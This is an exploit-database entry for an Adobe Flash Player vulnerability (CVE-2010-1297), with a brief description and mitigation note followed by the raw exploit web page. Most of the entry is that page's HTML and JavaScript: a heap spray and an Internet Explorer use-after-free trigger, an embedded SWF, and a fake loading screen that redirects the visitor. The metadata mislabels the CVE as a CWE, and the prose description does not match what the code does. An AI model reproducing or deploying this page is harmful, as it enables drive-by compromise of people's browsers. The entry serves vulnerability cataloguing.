Unspecified Vulnerability in Adobe Flash Player

vendor:

Flash Player

by:

Unknown

7,5

CVSS

HIGH

Unspecified Vulnerability

119

CWE

Product Name: Flash Player

Affected Version From: Adobe Flash Player 10.0.45.2 and earlier versions

Affected Version To: Adobe Flash Player 10.1.53.64 and earlier versions

Patch Exists: YES

Related CWE: CVE-2010-1297

CPE: a:adobe:flash_player

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2010

Unspecified Vulnerability in Adobe Flash Player

This exploit is related to an unspecified vulnerability in Adobe Flash Player. The vulnerability is exploited by a malicious SWF file embedded in a web page. The malicious SWF file is used to create a heap spray which is used to overwrite the return address of a function and execute arbitrary code. The vulnerability is triggered when the user visits a malicious web page.

Mitigation:

Adobe has released a security update to address this vulnerability. Users are advised to update their Adobe Flash Player to the latest version.

Source

Exploit-DB raw data:

<!doctype html>
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script >
function stc()
{
var Then = new Date();
Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
}
function cid()
{
var swf = 0;
try {
swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
}
if (!swf)
return 0;
var cookieString = new String(document.cookie);
if(cookieString.indexOf("d93kaj3Nja3") == -1)
{stc(); return 1;}else{ return 0;}
}
String.prototype.repeat=function (i){return new Array(isNaN(i)?1:++i).join(this);}
var tpx=unescape ("%u1414%u1414").repeat(0x60/4-1);
var ll=new Array();
for (i=0;i<3333;i++)ll.push(document.createElement("img"));
for(i=0;i<3333;i++) ll[i].className=tpx;
for(i=0;i<3333;i++) ll[i].className="";
CollectGarbage();
function b2()
{
try{xdd.replaceNode(document.createTextNode(" "));}catch(exception){}
try{xdd.outerText='';}catch(exception){}
CollectGarbage();
for(i=0;i<3333;i++) ll[i].className=tpx;
}
function a1(){
if (!cid())
return;
document.body.contentEditable="true";
try{xdd.applyElement(document.createElement("frameset"));}catch(exception){}
try{document.selection.createRange().select();}catch(exception){}
}
</ script >
</head>
<body onload='setTimeout("a1();",2000);' onresize=b2()>
<marquee id=xdd > </marquee>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
<param name="movie" value="storm.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="allowScriptAccess" value="sameDomain" />
<param name="allowFullScreen" value="true" />
</object>
</body>
<body>
<form name=loading>
¡¡<p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font>
¡¡¡¡<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
¡¡¡¡
¡¡¡¡<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
¡¡¡¡<script > ¡¡
var bar=0¡¡
var line="||"¡¡
var amount="||"¡¡
count()¡¡
function count(){¡¡
bar=bar+2¡¡
amount =amount + line¡¡
document.loading.chart.value=amount¡¡
document.loading.percent.value=bar+"%"¡¡
if (bar<99)¡¡
{setTimeout("count()",500);}¡¡
else¡¡
{window.location = "http://www.google.com.hk";}¡¡
}</ script >
¡¡</p>
</form>
<p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p>
</body>
</html>